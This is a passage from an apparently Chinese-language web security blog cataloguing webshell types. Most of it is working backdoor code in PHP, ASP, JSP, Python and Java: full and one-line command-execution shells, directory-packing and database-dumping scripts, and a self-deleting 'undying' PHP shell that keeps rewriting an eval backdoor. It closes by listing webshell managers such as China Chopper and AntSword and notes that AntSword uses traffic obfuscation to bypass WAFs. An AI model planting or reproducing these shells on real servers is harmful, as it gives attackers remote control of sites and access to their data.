invoke__">shell_exec</span>(<span class="variable">$cmd</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$shell</span> = <span class="keyword">new</span> <span class="title class_">Shell</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$shell</span>-&gt;<span class="title function_ invoke__">execute_command</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>ASP 示例：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">Class Shell</span><br><span class="line">    Public Function ExecuteCommand(cmd)</span><br><span class="line">        Dim shell</span><br><span class="line">        Set shell = Server.CreateObject(&quot;WScript.Shell&quot;)</span><br><span class="line">        ExecuteCommand = shell.Exec(cmd).StdOut.ReadAll()</span><br><span class="line">        Set shell = Nothing</span><br><span class="line">    End Function</span><br><span class="line">End Class</span><br><span class="line"></span><br><span class="line">Dim shell</span><br><span class="line">Set shell = New Shell</span><br><span class="line">If Request.Form(&quot;cmd&quot;) &lt;&gt; &quot;&quot; Then</span><br><span class="line">    Response.Write(shell.ExecuteCommand(Request.Form(&quot;cmd&quot;)))</span><br><span class="line">End If</span><br><span class="line">Set shell = Nothing</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p><strong>JSP 示例：</strong></p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.io.*&quot;</span>%&gt;</span><br><span class="line">&lt;%</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Shell</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">executeCommand</span><span class="params">(String command)</span> &#123;</span><br><span class="line">        <span class="type">StringBuffer</span> <span class="variable">output</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuffer</span>();</span><br><span class="line">        Process p;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            p = Runtime.getRuntime().exec(command);</span><br><span class="line">            p.waitFor();</span><br><span class="line">            <span class="type">BufferedReader</span> <span class="variable">reader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(<span class="keyword">new</span> <span class="title class_">InputStreamReader</span>(p.getInputStream()));</span><br><span class="line">            <span class="type">String</span> <span class="variable">line</span> <span class="operator">=</span> <span class="string">&quot;&quot;</span>;</span><br><span class="line">            <span class="keyword">while</span> ((line = reader.readLine())!= <span class="literal">null</span>) &#123;</span><br><span class="line">                output.append(line + <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> output.toString();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">Shell</span> <span class="variable">shell</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Shell</span>();</span><br><span class="line"><span class="keyword">if</span>(request.getParameter(<span class="string">&quot;cmd&quot;</span>) != <span class="literal">null</span>) &#123;</span><br><span class="line">    out.println(shell.executeCommand(request.getParameter(<span class="string">&quot;cmd&quot;</span>)));</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-小马（Simple-Shells）"><a href="#2-小马（Simple-Shells）" class="headerlink" title="2. 小马（Simple Shells）"></a>2. 小马（Simple Shells）</h3><p><strong>PHP 示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="title function_ invoke__">shell_exec</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>ASP 示例：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">If Request.QueryString(&quot;cmd&quot;) &lt;&gt; &quot;&quot; Then</span><br><span class="line">    Dim shell</span><br><span class="line">    Set shell = Server.CreateObject(&quot;WScript.Shell&quot;)</span><br><span class="line">    Response.Write(shell.Exec(Request.QueryString(&quot;cmd&quot;)).StdOut.ReadAll())</span><br><span class="line">    Set shell = Nothing</span><br><span class="line">End If</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p><strong>JSP 示例：</strong></p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line"><span class="keyword">if</span>(request.getParameter(<span class="string">&quot;cmd&quot;</span>) != <span class="literal">null</span>) &#123;</span><br><span class="line">    <span class="type">Runtime</span> <span class="variable">rt</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">    <span class="type">Process</span> <span class="variable">proc</span> <span class="operator">=</span> rt.exec(request.getParameter(<span class="string">&quot;cmd&quot;</span>));</span><br><span class="line">    <span class="type">InputStream</span> <span class="variable">is</span> <span class="operator">=</span> proc.getInputStream();</span><br><span class="line">    <span class="type">InputStreamReader</span> <span class="variable">isr</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InputStreamReader</span>(is);</span><br><span class="line">    <span class="type">BufferedReader</span> <span class="variable">br</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(isr);</span><br><span class="line">    String line;</span><br><span class="line">    <span class="keyword">while</span> ((line = br.readLine()) != <span class="literal">null</span>) &#123;</span><br><span class="line">        out.println(line);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>
<h3 id="3-一句话木马（One-liner-Shells）"><a href="#3-一句话木马（One-liner-Shells）" class="headerlink" title="3. 一句话木马（One-liner Shells）"></a>3. 一句话木马（One-liner Shells）</h3><p><strong>PHP 示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>ASP 示例：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;% Execute(Request(&quot;cmd&quot;)) %&gt;</span><br></pre></td></tr></table></figure>

<p><strong>JSP 示例：</strong></p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;% Runtime.getRuntime().exec(request.getParameter(<span class="string">&quot;cmd&quot;</span>)); %&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Python 示例（用于服务器支持Python的情况）：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Python版本的一句话木马相对较少见，但原理类似</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">exec</span>(request.form[<span class="string">&#x27;cmd&#x27;</span>]))</span><br></pre></td></tr></table></figure>

<h3 id="4-打包马（Packing-Shells）"><a href="#4-打包马（Packing-Shells）" class="headerlink" title="4. 打包马（Packing Shells）"></a>4. 打包马（Packing Shells）</h3><p><strong>PHP 示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$zip</span> = <span class="keyword">new</span> <span class="title class_">ZipArchive</span>();</span><br><span class="line"><span class="variable">$filename</span> = <span class="string">&quot;./my_backup.zip&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$zip</span>-&gt;<span class="title function_ invoke__">open</span>(<span class="variable">$filename</span>, <span class="title class_">ZipArchive</span>::<span class="variable constant_">CREATE</span>)!==<span class="literal">TRUE</span>) &#123;</span><br><span class="line">    <span class="keyword">exit</span>(<span class="string">&quot;cannot open &lt;<span class="subst">$filename</span>&gt;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$dir</span> = <span class="string">&#x27;path/to/directory/&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 添加目录到zip文件</span></span><br><span class="line"><span class="variable">$files</span> = <span class="keyword">new</span> <span class="built_in">RecursiveIteratorIterator</span>(<span class="keyword">new</span> <span class="built_in">RecursiveDirectoryIterator</span>(<span class="variable">$dir</span>), <span class="title class_">RecursiveIteratorIterator</span>::<span class="variable constant_">LEAVES_ONLY</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$name</span> =&gt; <span class="variable">$file</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="variable">$file</span>-&gt;<span class="title function_ invoke__">isDir</span>()) &#123;</span><br><span class="line">        <span class="variable">$filePath</span> = <span class="variable">$file</span>-&gt;<span class="title function_ invoke__">getRealPath</span>();</span><br><span class="line">        <span class="variable">$relativePath</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$filePath</span>, <span class="title function_ invoke__">strlen</span>(<span class="variable">$dir</span>) + <span class="number">1</span>);</span><br><span class="line">        <span class="variable">$zip</span>-&gt;<span class="title function_ invoke__">addFile</span>(<span class="variable">$filePath</span>, <span class="variable">$relativePath</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$zip</span>-&gt;<span class="title function_ invoke__">close</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;Backup created!&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>ASP 示例：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">Dim objFSO, objFolder, objFile</span><br><span class="line">Set objFSO = CreateObject(&quot;Scripting.FileSystemObject&quot;)</span><br><span class="line">Set objFolder = objFSO.GetFolder(Server.MapPath(&quot;path/to/directory&quot;))</span><br><span class="line"></span><br><span class="line">For Each objFile in objFolder.Files</span><br><span class="line">    Response.Write(objFile.Name &amp; &quot;&lt;br&gt;&quot;)</span><br><span class="line">Next</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>
<p><em>注：ASP本身没有内建的压缩库支持，但可以调用外部程序或组件来实现。</em></p>
<p><strong>JSP 示例：</strong></p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.util.zip.*,java.io.*&quot;</span>%&gt;</span><br><span class="line">&lt;%</span><br><span class="line"><span class="type">String</span> <span class="variable">sourceFolder</span> <span class="operator">=</span> <span class="string">&quot;/path/to/directory&quot;</span>;</span><br><span class="line"><span class="type">String</span> <span class="variable">outputZipFile</span> <span class="operator">=</span> <span class="string">&quot;output.zip&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">byte</span>[] buffer = <span class="keyword">new</span> <span class="title class_">byte</span>[<span class="number">1024</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="type">FileOutputStream</span> <span class="variable">fos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(outputZipFile);</span><br><span class="line">    <span class="type">ZipOutputStream</span> <span class="variable">zos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ZipOutputStream</span>(fos);</span><br><span class="line">    <span class="type">File</span> <span class="variable">dir</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">File</span>(sourceFolder);</span><br><span class="line">    File[] files = dir.listFiles();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (File file : files) &#123;</span><br><span class="line">        <span class="type">FileInputStream</span> <span class="variable">fis</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(file);</span><br><span class="line">        zos.putNextEntry(<span class="keyword">new</span> <span class="title class_">ZipEntry</span>(file.getName()));</span><br><span class="line">        </span><br><span class="line">        <span class="type">int</span> length;</span><br><span class="line">        <span class="keyword">while</span> ((length = fis.read(buffer)) &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            zos.write(buffer, <span class="number">0</span>, length);</span><br><span class="line">        &#125;</span><br><span class="line">        zos.closeEntry();</span><br><span class="line">        fis.close();</span><br><span class="line">    &#125;</span><br><span class="line">    zos.close();</span><br><span class="line">&#125; <span class="keyword">catch</span> (IOException ioe) &#123;</span><br><span class="line">    ioe.printStackTrace();</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>
<h3 id="5-拖库马（Database-Dump-Shells）"><a href="#5-拖库马（Database-Dump-Shells）" class="headerlink" title="5. 拖库马（Database Dump Shells）"></a>5. 拖库马（Database Dump Shells）</h3><p><strong>PHP 示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$servername</span> = <span class="string">&quot;localhost&quot;</span>;</span><br><span class="line"><span class="variable">$username</span> = <span class="string">&quot;username&quot;</span>;</span><br><span class="line"><span class="variable">$password</span> = <span class="string">&quot;password&quot;</span>;</span><br><span class="line"><span class="variable">$dbname</span> = <span class="string">&quot;myDB&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 创建连接</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="variable">$servername</span>, <span class="variable">$username</span>, <span class="variable">$password</span>, <span class="variable">$dbname</span>);</span><br><span class="line"><span class="comment">// 检查连接</span></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$conn</span>-&gt;connect_error) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;Connection failed: &quot;</span> . <span class="variable">$conn</span>-&gt;connect_error);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM Users&quot;</span>;</span><br><span class="line"><span class="variable">$result</span> = <span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$result</span>-&gt;num_rows &gt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// 输出数据</span></span><br><span class="line">    <span class="keyword">while</span>(<span class="variable">$row</span> = <span class="variable">$result</span>-&gt;<span class="title function_ invoke__">fetch_assoc</span>()) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;id: &quot;</span> . <span class="variable">$row</span>[<span class="string">&quot;id&quot;</span>]. <span class="string">&quot; - Name: &quot;</span> . <span class="variable">$row</span>[<span class="string">&quot;username&quot;</span>]. <span class="string">&quot; &quot;</span> . <span class="variable">$row</span>[<span class="string">&quot;email&quot;</span>]. <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;0 results&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">close</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>ASP 示例：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;%</span><br><span class="line">Dim conn, rs, sql</span><br><span class="line">Set conn = Server.CreateObject(&quot;ADODB.Connection&quot;)</span><br><span class="line">conn.Open &quot;Provider=SQLOLEDB;Data Source=your_server;Initial Catalog=your_db;User Id=your_username;Password=your_password;&quot;</span><br><span class="line"></span><br><span class="line">sql = &quot;SELECT * FROM Users&quot;</span><br><span class="line">Set rs = conn.Execute(sql)</span><br><span class="line"></span><br><span class="line">Do While Not rs.EOF</span><br><span class="line">    Response.Write(&quot;Username: &quot; &amp; rs(&quot;username&quot;) &amp; &quot;&lt;br&gt;&quot;)</span><br><span class="line">    rs.MoveNext</span><br><span class="line">Loop</span><br><span class="line"></span><br><span class="line">rs.Close</span><br><span class="line">Set rs = Nothing</span><br><span class="line">conn.Close</span><br><span class="line">Set conn = Nothing</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p><strong>JSP 示例：</strong></p>
<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page <span class="keyword">import</span>=<span class="string">&quot;java.sql.*&quot;</span> %&gt;</span><br><span class="line">&lt;%</span><br><span class="line"><span class="type">String</span> <span class="variable">url</span> <span class="operator">=</span> <span class="string">&quot;jdbc:mysql://localhost:3306/myDB&quot;</span>;</span><br><span class="line"><span class="type">String</span> <span class="variable">user</span> <span class="operator">=</span> <span class="string">&quot;username&quot;</span>;</span><br><span class="line"><span class="type">String</span> <span class="variable">password</span> <span class="operator">=</span> <span class="string">&quot;password&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">Connection</span> <span class="variable">conn</span> <span class="operator">=</span> DriverManager.getConnection(url, user, password);</span><br><span class="line"><span class="type">Statement</span> <span class="variable">stmt</span> <span class="operator">=</span> conn.createStatement();</span><br><span class="line"><span class="type">ResultSet</span> <span class="variable">rs</span> <span class="operator">=</span> stmt.executeQuery(<span class="string">&quot;SELECT * FROM Users&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (rs.next()) &#123;</span><br><span class="line">    out.println(<span class="string">&quot;Username: &quot;</span> + rs.getString(<span class="string">&quot;username&quot;</span>) + <span class="string">&quot;&lt;br&gt;&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">rs.close();</span><br><span class="line">stmt.close();</span><br><span class="line">conn.close();</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<h3 id="6-内存马（In-Memory-Shells）"><a href="#6-内存马（In-Memory-Shells）" class="headerlink" title="6. 内存马（In-Memory Shells）"></a>6. 内存马（In-Memory Shells）</h3><p>内存马是无文件攻击的一种常用手段，随着攻防演练热度越来越高：攻防双方的博弈，流量分析、EDR等专业安全设备被蓝方广泛使用，传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到，内存马使用越来越多。</p>
<p>Webshell内存马，是在内存中写入恶意后门和木马并执行，达到远程控制Web服务器的一类内存马，其瞄准了企业的对外窗口：网站、应用。但传统的Webshell都是基于文件类型的，黑客可以利用上传工具或网站漏洞植入木马，区别在于Webshell内存马是无文件马，利用中间件的进程执行某些恶意代码，不会有文件落地，给检测带来巨大难度。</p>
<p>PHP内存马，也叫做PHP不死马、不死僵尸，在线下AWD中是常用手段之一。在蚁剑中也有专门的插件可以一键注入内存马。<br>原理也很简单，相对于Java可以直接把整个shell写入内存，php内存马的实现则是将一个木马反复写入，达到无法删除的目的。<br><strong>PHP 示例（利用PHP-FPM漏洞的示例，虚构）：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">ignore_user_abort</span>(<span class="literal">true</span>); <span class="comment">//设置客户端断开连接时是否中断脚本的执行</span></span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">0</span>); <span class="comment">//设置脚本最大执行时间，linux下可能不大好用</span></span><br><span class="line"><span class="title function_ invoke__">unlink</span>(<span class="keyword">__FILE__</span>); <span class="comment">//删除自身</span></span><br><span class="line"><span class="variable">$file</span> = <span class="string">&#x27;shell.php&#x27;</span>;</span><br><span class="line"><span class="variable">$code</span> = <span class="string">&#x27;&lt;?php @eval($_POST[&quot;cmd&quot;]);?&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$file</span>, <span class="variable">$code</span>);<span class="comment">//恶意代码</span></span><br><span class="line"><span class="title function_ invoke__">usleep</span>(<span class="number">5000</span>); <span class="comment">//延迟执行可有可无</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>本质上原理是不变，执行死循环，然后删除自身。但实际上这样做还是会有文件落地，只是管理员删不掉、删不完罢了。也可以用利用fastcgi对php攻击执行命令，但这样是否算一个驻留wenshell还有待争议。</p>
<p><strong>Python 示例（使用flask框架）：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request</span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/exec&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exec_code</span>():</span><br><span class="line">    <span class="built_in">exec</span>(request.data)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Code executed&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>
<p><em>注：这个示例表明代码直接从请求中执行，不进行任何磁盘写入操作。</em></p>
<p><strong>Java 示例（通过Servlet执行命令）：</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.servlet.*;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.*;</span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">InMemoryShell</span> <span class="keyword">extends</span> <span class="title class_">HttpServlet</span> &#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">doPost</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span> <span class="keyword">throws</span> ServletException, IOException &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">command</span> <span class="operator">=</span> request.getReader().readLine();</span><br><span class="line">        <span class="type">Process</span> <span class="variable">proc</span> <span class="operator">=</span> Runtime.getRuntime().exec(command);</span><br><span class="line">        <span class="type">OutputStream</span> <span class="variable">out</span> <span class="operator">=</span> proc.getOutputStream();</span><br><span class="line">        out.close();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="WebShell管理工具"><a href="#WebShell管理工具" class="headerlink" title="WebShell管理工具"></a>WebShell管理工具</h2><ol>
<li><p>中国菜刀（Chopper）<br>  中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！在非简体中文环境下使用，自动切换到英文界面。UNICODE方式编译，支持多国语言输入显示。<br>  官方网站：<a target="_blank" rel="noopener" href="http://www.maicaidao.com/">http://www.maicaidao.com/</a></p>
</li>
<li><p>中国蚁剑（AntSword）<br>  中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。使用编&#x2F;解码器进行流量混淆可绕过WAF，并且有多款实用插件。<br>  因为菜刀也许有后门(偷shell)，不放心可以用蚁剑，蚁剑还可以看源码，功能也比菜刀强些。<br>  项目地址：<br>  <a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/antSword">https://github.com/AntSwordProject/antSword</a></p>
</li>
